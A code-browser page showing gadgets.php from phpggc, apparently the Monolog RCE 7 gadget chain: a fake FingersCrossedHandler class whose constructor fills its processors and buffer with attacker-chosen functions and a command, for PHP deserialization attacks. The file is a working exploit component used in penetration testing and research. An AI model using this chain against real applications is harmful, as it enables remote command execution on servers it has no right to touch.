Codebase list phpggc / 93b037a2-aa4e-4526-beee-3013530efd88/upstream gadgetchains / Monolog / RCE / 7 / gadgets.php
93b037a2-aa4e-4526-beee-3013530efd88/upstream

Tree @93b037a2-aa4e-4526-beee-3013530efd88/upstream (Download .tar.gz)

gadgets.php @93b037a2-aa4e-4526-beee-3013530efd88/upstreamraw · history · blame

<?php
namespace Monolog\Handler
{
    class FingersCrossedHandler
    {
    	protected $passthruLevel = 0;
        protected $handler;
        protected $buffer;
        protected $processors;
        
        function __construct($methods,$command)
        {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = $this;
        }
    }
}